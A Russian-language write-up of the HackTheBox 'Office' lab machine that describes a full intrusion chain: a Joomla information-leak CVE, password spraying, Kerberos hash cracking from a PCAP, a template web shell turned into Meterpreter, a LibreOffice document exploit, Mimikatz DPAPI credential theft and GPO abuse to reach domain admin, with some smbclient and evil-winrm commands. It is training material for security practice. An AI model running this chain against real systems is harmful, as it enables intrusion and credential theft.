Telegram / Boosty / Видео

Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.

Смотри на t.me/kiberdruzhinnik/204.

Также на https://boosty.to/kiberdruzhinnik/posts/f562b503-161e-416f-b77f-9007fabe0216 я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.

Обзор сервисов

Просканируем порты и найдем открытые сервисы:

Open 10.129.108.180:3269
Open 10.129.108.180:3268
Open 10.129.108.180:636
Open 10.129.108.180:593
Open 10.129.108.180:464
Open 10.129.108.180:445
Open 10.129.108.180:443
Open 10.129.108.180:389
Open 10.129.108.180:139
Open 10.129.108.180:88
Open 10.129.108.180:80
Open 10.129.108.180:53

Веб

На веб-сервисе находим Joomla.

alt text

alt text

Используем CVE-2023-23752 для получения информации о базе данных.

Users
[474] Tony Stark (Administrator) - [email protected] - Super Users

Site info
Site name: Holography Industries
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: root
DB password: pwd
DB name: joomla_db
DB prefix: if2tx_
DB encryption 0

С помощью kerbrute ищем валидных пользователей на домен контроллере и относительно них проверяем пароль, который нашли выше.

Получаем учетку, с помощью которой можем залогиниться в самбу.

$ smbclient -U user --password='pwd' -L //office.htb/

 Sharename       Type      Comment
 ---------       ----      -------
 ADMIN$          Disk      Remote Admin
 C$              Disk      Default share
 IPC$            IPC       Remote IPC
 NETLOGON        Disk      Logon server share 
 SOC Analysis    Disk      
 SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to office.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Из каталога SOC Analysis качаем PCAP-дамп и открываем его в Wireshark.

Достаем и брутим Kerberos Preauth Cipher.

alt text

Получим пароль, с помощью которого сможем залогиниться в административную панель Joomla http://office.htb/administrator/.

С помощью шаблонов для джумлы сделаем себе веб-шелл.

alt text

И превратим его в Meterpreter.

alt text

Вспоминаем, что у нас есть пароль Тони Старка и с помощью runascs.exe получаем шелл от него.

alt text

Флаг пользователя

alt text

Неправильный способ для повышения привилегий

MySQL позволяет загрузить плагины, и мы можем писать в эту папку. Сгенерируем свой Meterpreter и загрузим в нужный каталог.

Далее пробросим порт на локальную машину с MySQL и, используя логин и пароль из первоначальной уязвимости Joomla, зайдем в консоль MySQL.

Далее с помощью создания функции и подгрузки плагина получаем шелл.

alt text

Добираем привилегии и получаем системный шелл через SeImpersonatePrivilege.

Флаг суперпользователя

alt text

Верный способ для поднятия привилегий

В локалке крутится internal сервис. Пробросим порт и посмотрим на него.

alt text

alt text

Можно загружать документы в формате ODT. Воспользуемся CVE-2023-2255 и получим шелл от имени пользователя ppotts.

alt text

Теперь последовательно по инструкции с помощью Mimikatz вытащим креды из DPAPI.

Идентификаторы кредов такие:

(Meterpreter 1)(C:\Program Files\LibreOffice 5\program) > dir %appdata%/Microsoft/Credentials
Listing: C:\Users\PPotts\AppData\Roaming/Microsoft/Credentials
==============================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  358   fil   2023-05-10 00:08:54 +0300  18A1927A997A794B65E9849883AC3F3E
100666/rw-rw-rw-  398   fil   2023-05-10 02:03:21 +0300  84F1CAEEBF466550F4967858F9353FB4
100666/rw-rw-rw-  374   fil   2024-01-18 22:53:30 +0300  E76CCA3670CD9BB98DF79E0A8D176F1E

А идентификаторы мастер ключей такие:

(Meterpreter 2)(C:\users\public) > dir %appdata%\\microsoft\\protect\\S-1-5-21-1199398058-4196589450-691661856-1107
Listing: C:\Users\PPotts\AppData\Roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107
========================================================================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  740   fil   2024-01-18 02:43:56 +0300  10811601-0fa9-43c2-97e5-9bef8471fc7d
100666/rw-rw-rw-  740   fil   2023-05-03 02:13:34 +0300  191d3f9d-7959-4b4d-a520-a444853c47eb
100666/rw-rw-rw-  900   fil   2023-05-03 02:13:34 +0300  BK-OFFICE
100666/rw-rw-rw-  24    fil   2024-01-18 02:43:56 +0300  Preferred

После получения кредов OFFICE\HHogan просто подключимся к нему с помощью evil-winrm:

evil-winrm -i dc.office.htb -u hhogan -p "pwd"

Этот пользователь состоит в группе GPO Managers:

> whoami /all
...
OFFICE\GPO Managers                        Group            S-1-5-21-1199398058-4196589450-691661856-1117 Mandatory group, Enabled by default, Enabled group
...

А это значит, что мы можем использовать SharpGPOAbuse для добавления этого пользователя в список локальных администраторов.

alt text

После этого достаточно немного подождать и повысить привилегии с помощью PsExec.

alt text